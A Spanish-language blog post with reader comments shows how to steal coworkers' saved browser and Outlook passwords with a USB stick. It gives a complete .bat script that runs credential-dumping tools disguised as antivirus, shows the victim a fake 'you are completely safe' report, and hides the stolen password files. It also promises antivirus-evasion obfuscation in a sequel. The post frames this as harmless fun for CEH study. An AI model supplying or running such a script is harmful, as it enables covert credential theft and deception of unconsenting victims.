Divirtiéndonos con un USB - Primera Parte

6 comments
¡ Buenas tardes compañeros ! 

A fin de éste año tengo la idea (ya casi confirmada) de rendir mi primera certificación de Seguridad Informática, en fin, la certificación CEH.

Leyendo una de las teorías, si mal no recuerdo era el capítulo de Malware, encontré ciertas herramientas para divertirnos con alguna PC de nuestros compañeros. Solo necesitaremos un USB y las herramientas que subí a este enlace, las cuales son las siguientes:

 - Firefox-AV
 - IE-AV
 - Mail-AV


Éstas herramientas se encargan de buscar información que queda almacenada en nuestro navegador o en alguna cuenta asociada a nuestro correo electrónico (Outlook en éste caso) y nos revelarán sus contraseñas. En sí, es un proceso algo más largo pero no nos vamos a meter en detalles y vamos a disfrutar de las herramientas !

Una vez que los hayamos descargado, podemos ejecutarlos y ver su potencial. (Voy a tratar de buscar alguna herramienta que pueda recuperar la información de Chrome y luego actualizaré el post)





Pero si realmente queremos divertirnos un poco con algunos compañeros algo despistados, podemos hacerle creer que son AntiVirus (por eso el AV como sufijo) para nuestras aplicaciones del ordenador (Total, todo el mundo descarga AV's falsos .. y .. quien desconfiaría de un hacker ahora ?)

Crearemos un simple script .bat con el siguiente fragmento:

@echo off
cls
echo "Generando un reporte del sistema, por favor aguarde ..."
start MAIL-AV.exe /stext MAIL.txt
start IE-AV.exe /stext IE.txt
start FIREFOX-AV.exe /stext FIREFOX.txt
timeout /t 5
cls
echo "Finalizacion de registro de la memoria, por favor revise el archivo Resultados.txt \n \n"
echo Estas completamente a salvo en tu sistema > Resultados.txt
pause
attrib +r +h +s FIREFOX.txt
attrib +r +h +s IE.txt
attrib +r +h +s MAIL.txt
exit

Al cual llamaremos Launcher-AV.bat o como quieran.

Al ejecutarlo, guardaremos los resultados de nuestras herramientas en diferentes archivos de texto, para luego ocultarlos y quedarnos con esos datos (Tranquilos, todo está en el script). Al usuario solo le mostraremos un falso Resultados.txt.

Para luego poder recuperar los archivos ocultos pueden usar el siguiente comando:


attrib -r -h -s /s /d


 Como recomendaciones, les digo que traten de que el usuario ejecute estas herramientas dentro del Pendrive, para poder ya tener la información oculta en el mismo.

Espero que se diviertan .. pero CON CUIDADO !

Antes de finalizar, quisiera disculparme por mi mala programacion en .bat, hace mucho no tocaba este tema. 

Ah, y me olvidaba. En la segunda parte vamos a aprender a ofuscar el código anterior y tratar de utilizar técnicas de encoding para bypassear AV's.

Por G.- de la Redacción de SniferL4bs.

6 comentarios

  1. Las memorias usb últimamente son las grandes protagonistas de la ciberseguridad. Y es que el tema da para mucho!

    ResponderEliminar
    Respuestas
    1. La verdad que sí, más que nada por eso se me ocurrio escribir y hacer volar un poco la imaginación. Gracias por tu comentario y espero que te haya gustado el artículo !

      Eliminar
    2. La verdad que si, Buguroo aun mas con los ultimos ataques como BadUSB dalo por seguro que no sera la unica entrada relacionada a USB :),

      Regards,
      Snifer

      Eliminar
  2. No veo que sea una técnica de cracking muy sofisticada.
    Es como si creas un .bat que contiene un format C: y le dices a alguien que lo ejecute y , confiado , lo hace.
    Lo que habría que hacer es dejar a alguien un USB con musica, al pincharlo se ejecutase un programa malicioso y sin , dejar huella, recopilase datos

    ResponderEliminar
    Respuestas
    1. Estimado jmzc donde se indico técnica de Cracking??

      Lo que aquí se hace uso es de ingenieria social y el *bat tiene como objetivo el de hacerlo mas creíble mostrando un documento de texto.

      Tomando en cuenta que esta es la primera entrada haciendo uso de USB de apoco iremos explotando con mas técnicas incluso con el querido USB Rubber Ducky.


      Regards,
      Snifer


      Eliminar
    2. Señor anónimo, gracias por el comentario. Nunca fue nombrado el tema de cracking .. es más, mirá el titulo del artículo. Encontré herramientas útiles para DIVERTIRNOS y que mejor que llevarlo a un USB (espero que entiendas).
      En el artículo trato de explicar una técnica extremadamente básica de Ingeniería Social, pero que mejor de tomarnos un poco nuestro trabajo a la risa.

      Gracias igualmente por tu comentario.

      G.-

      Eliminar